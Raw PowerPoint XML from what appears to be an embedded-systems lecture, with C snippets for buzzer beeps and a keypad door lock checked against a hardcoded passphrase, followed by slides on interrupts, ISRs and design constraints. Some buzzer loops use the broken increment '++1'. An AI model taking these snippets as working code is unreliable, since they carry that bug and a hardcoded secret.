              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (i=0; i&lt;10000; ++1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		_nop();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	_sr(0, BUZZER_AUX_REG);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BuzzerLongBeep()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</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i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	_sr(1, BUZZER_AUX_REG);</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (i=0; i&lt;100000; ++1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		_nop();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	_sr(0, BUZZER_AUX_REG);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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380158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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="304800"/>
            <a:ext cx="4724400" cy="6002338"/>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const char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] PASSPHRASE=“1234#”;</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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserEntry[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>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   while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)</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UserEntry[0]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(UserEntry[0]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UserEntry[1]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(UserEntry[1]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 ...</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UserEntry[4]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(UserEntry[4]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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="304800"/>
            <a:ext cx="4343400" cy="4032250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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      if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strncmp</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UserEntry</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PASSPHRASE, </a:t>
            </a:r>
          </a:p>
          <a:p>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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PASSPHRASE) == 0)</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (i=0; i&lt;100000; ++i)</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nop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DoorUnlock</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FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      else</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9648680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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31924972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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>interrupt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> is a signal from a component in the embedded system to the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Interrupts are by nature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>asynchronous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>, i.e. can occur at any time during the program’s execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>When an interrupt occurs, the processor stops whatever it is doing and handles the interrupt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19968231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smtClean="0"/>
              <a:t>Events that cause interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1600200"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Data arrival to peripheral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>example: a network device will signal an interrupt when a network packet was received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Operation completion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>example: an offload engine will signal an interrupt when offload operation completed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>User Event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>example: user pressed a mouse button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Elapsed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>– example: a timer device will signal an interrupt every 10ms  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>– an interrupt issued by the memory controller or by the CPU itself. Exceptions are usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>synchronous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(example: division by 0, memory exception)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Trap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> – similar to exception, usually without the “problem” connotation (example: software interrupt, debugger interrupt)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41789237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en-US" smtClean="0"/>
              <a:t>The Interrupt Service Routine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>When an interrupt occurs, the processor calls an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Interrupt Service Routine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Action of the ISR is very specific to the processor and the peripheral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The ISR is responsible for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>acknowledging the interrupt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This means, notify the device that the CPU addressed the interrupt and it can go back to an uninterrupted state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>When the ISR is running, interrupts are disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>When there is an OS, there are no context switches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ISRs should be as short as possible!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173729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en-US" smtClean="0"/>
              <a:t>Highly Constrained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedded design ends up with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>tangible product</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>High volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cost driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Memory and storage space constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HW / SW responsibilities trade off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Power consumption constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Physical constraints (size, weight, temperature)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22396507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en-US" smtClean="0"/>
              <a:t>Acknowledging the Interrupt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The interrupt must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>acknowledged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, or else it will occur again when the interrupt exits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Typically the peripheral has two registers two manage interrupts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Interrupt Enable Register (IER)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every bit in the IER represents an interrupt cause. It is set by the CPU to indicate that it would like to receive interrupts on this cause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Interrupt Cause Register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(ICR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
